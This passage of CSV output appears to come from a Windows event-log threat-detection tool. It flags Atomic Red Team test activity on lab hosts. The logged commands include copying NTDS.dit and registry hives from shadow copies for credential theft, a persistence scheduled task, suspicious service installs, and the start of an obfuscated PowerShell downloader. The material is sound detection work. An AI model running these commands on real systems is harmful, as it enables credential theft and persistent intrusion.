calc.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4099 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:54.080 + 747F3D96-DA72-5D31-0000-0010044F3F00 + 1300 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548274.099318,2019-07-19T18:57:54.099318+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4098 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:53.815 + 747F3D96-DA71-5D31-0000-00101A463F00 + 6168 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + 
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1202] Indirect Command Execution,1563548273.882434,2019-07-19T18:57:53.882434+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe -a C:\Windows\system32\javacpl.cpl ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4097 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:52.816 + 747F3D96-DA70-5D31-0000-00100E2C3F00 + 112 + C:\Windows\System32\pcalua.exe + 10.0.17763.1 (WinBuild.160101.0800) + Program Compatibility Assistant + Microsoft® Windows® Operating System + Microsoft Corporation + pcalua.exe -a C:\Windows\system32\javacpl.cpl + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653 + 747F3D96-DA70-5D31-0000-001007293F00 + 608 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a C:\Windows\system32\javacpl.cpl" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548272.982726,2019-07-19T18:57:52.982726+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a C:\Windows\system32\javacpl.cpl" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4096 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:52.784 + 747F3D96-DA70-5D31-0000-001007293F00 + 608 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a 
C:\Windows\system32\javacpl.cpl" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1202] Indirect Command Execution,1563548272.92361,2019-07-19T18:57:52.923610+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe -a Java ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4095 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:50.232 + 747F3D96-DA6E-5D31-0000-001081F93E00 + 1284 + C:\Windows\System32\pcalua.exe + 10.0.17763.1 (WinBuild.160101.0800) + Program Compatibility Assistant + Microsoft® Windows® Operating System + Microsoft Corporation + pcalua.exe -a Java + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653 + 747F3D96-DA6E-5D31-0000-0010D8F63E00 + 3316 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a Java" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548270.45384,2019-07-19T18:57:50.453840+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a Java" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4094 + + + + + 
Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:50.198 + 747F3D96-DA6E-5D31-0000-0010D8F63E00 + 3316 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a Java" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1202] Indirect Command Execution,1563548270.398446,2019-07-19T18:57:50.398446+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe -a -c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4093 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:47.232 + 747F3D96-DA6B-5D31-0000-00102DD33E00 + 5348 + C:\Windows\System32\pcalua.exe + 10.0.17763.1 (WinBuild.160101.0800) + Program Compatibility Assistant + Microsoft® Windows® Operating System + Microsoft Corporation + pcalua.exe -a -c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653 + 747F3D96-DA6B-5D31-0000-0010CCD03E00 + 5332 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a -c" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line 
Interface,1563548267.238555,2019-07-19T18:57:47.238555+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a -c" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4092 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:47.195 + 747F3D96-DA6B-5D31-0000-0010CCD03E00 + 5332 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a -c" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548267.218345,2019-07-19T18:57:47.218345+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4091 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:46.915 + 747F3D96-DA6A-5D31-0000-00104BC83E00 + 888 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1563548266.92729,2019-07-19T18:57:46.927290+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4090 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Persistence - Scheduled Task Management + 2019-07-19 14:57:46.845 + 747F3D96-DA6A-5D31-0000-0010C5C43E00 + 3352 + C:\Windows\System32\schtasks.exe + 10.0.17763.1 (WinBuild.160101.0800) + Task Scheduler Configuration Tool + Microsoft® Windows® Operating System + Microsoft Corporation + SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69 + 747F3D96-DA6A-5D31-0000-001074C23E00 + 3872 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548266.84987,2019-07-19T18:57:46.849870+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running 
image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4089 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:46.814 + 747F3D96-DA6A-5D31-0000-001074C23E00 + 3872 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4135 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:50.383 + 747F3D96-DDB6-5D31-0000-0010273D4C00 + 3952 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + 
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-0020FF090500 + 0x509ff + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-D4A4-5D31-0000-0010DD6D0000 + 804 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch -p + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4135 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:50.383 + 747F3D96-DDB6-5D31-0000-0010273D4C00 + 3952 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-0020FF090500 + 0x509ff + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-D4A4-5D31-0000-0010DD6D0000 + 804 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch -p + 
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4135 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:50.383 + 747F3D96-DDB6-5D31-0000-0010273D4C00 + 3952 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-0020FF090500 + 0x509ff + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-D4A4-5D31-0000-0010DD6D0000 + 804 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch -p + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549087.258254,2019-07-19T19:11:27.258254+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4133 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:27.220 + 747F3D96-DD9F-5D31-0000-001041504B00 + 6508 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + 
Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549087.233257,2019-07-19T19:11:27.233257+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4132 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:27.192 + 747F3D96-DD9F-5D31-0000-00102D4D4B00 + 976 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line 
Interface,1563549087.202862,2019-07-19T19:11:27.202862+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4131 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:27.156 + 747F3D96-DD9F-5D31-0000-00101A4A4B00 + 5772 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549087.169217,2019-07-19T19:11:27.169217+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4130 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:27.069 + 747F3D96-DD9F-5D31-0000-00107B454B00 + 3344 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 
1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Service installed in the system,1557665564.155703,2019-05-12T16:52:44.155703+04:00,,Audit,High,"Service installed in the system with Name ( WinPwnage ) , File Name ( %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe ) , Service Type ( user mode service ) , Service Start Type ( demand start ) , Service Account ( LocalSystem )",7045," + + + + + 7045 + 0 + 4 + 0 + 0 + 0x8080000000000000 + + + 10446 + + + + + System + IEWIN7 + + + + + WinPwnage + %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe + user mode service + demand start + LocalSystem + +",IEWIN7,System +cobalt strike service detected installed in the system,1557665564.155703,2019-05-12T16:52:44.155703+04:00,,Threat,Critical,cobalt strike or meterpreter service detected installed in the system,7045," + + + + + 7045 + 0 + 4 + 0 + 0 + 0x8080000000000000 + + + 10446 + + + + + System + IEWIN7 + + + + + WinPwnage + %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe + user mode service + demand start + LocalSystem + +",IEWIN7,System +Service installed in the system,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,"Service installed in the system with Name ( remotesvc ) , File Name ( calc.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045," + + + + + 7045 + 0 + 4 + 0 + 0 + 0x8080000000000000 + + + 6045 + + + + + System + WIN-77LTAPHIQ1R.example.corp + + + + + remotesvc + calc.exe + user mode service + auto start + LocalSystem + +",WIN-77LTAPHIQ1R.example.corp,System +System 
Logs Cleared,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,System Logs Cleared,104," + + + + + 104 + 0 + 4 + 104 + 0 + 0x8000000000000000 + + + 27736 + + + + + System + PC01.example.corp + + + + + + user01 + EXAMPLE + System + + + +",PC01.example.corp,System +Service installed in the system,1551605354.168476,2019-03-03T13:29:14.168476+04:00,,Audit,High,"Service installed in the system with Name ( spoolsv ) , File Name ( cmd.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045," + + + + + 7045 + 0 + 4 + 0 + 0 + 0x8080000000000000 + + + 4482 + + + + + System + WIN-77LTAPHIQ1R.example.corp + + + + + spoolsv + cmd.exe + user mode service + auto start + LocalSystem + +",WIN-77LTAPHIQ1R.example.corp,System +Service installed in the system,1551605038.85688,2019-03-03T13:23:58.856880+04:00,,Audit,High,"Service installed in the system with Name ( spoolfool ) , File Name ( cmd.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045," + + + + + 7045 + 0 + 4 + 0 + 0 + 0x8080000000000000 + + + 4480 + + + + + System + WIN-77LTAPHIQ1R.example.corp + + + + + spoolfool + cmd.exe + user mode service + auto start + LocalSystem + +",WIN-77LTAPHIQ1R.example.corp,System +Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418573.34971,2020-08-26T09:09:33.349710+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,\Windows\System32) in event with Command Line ($Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = 
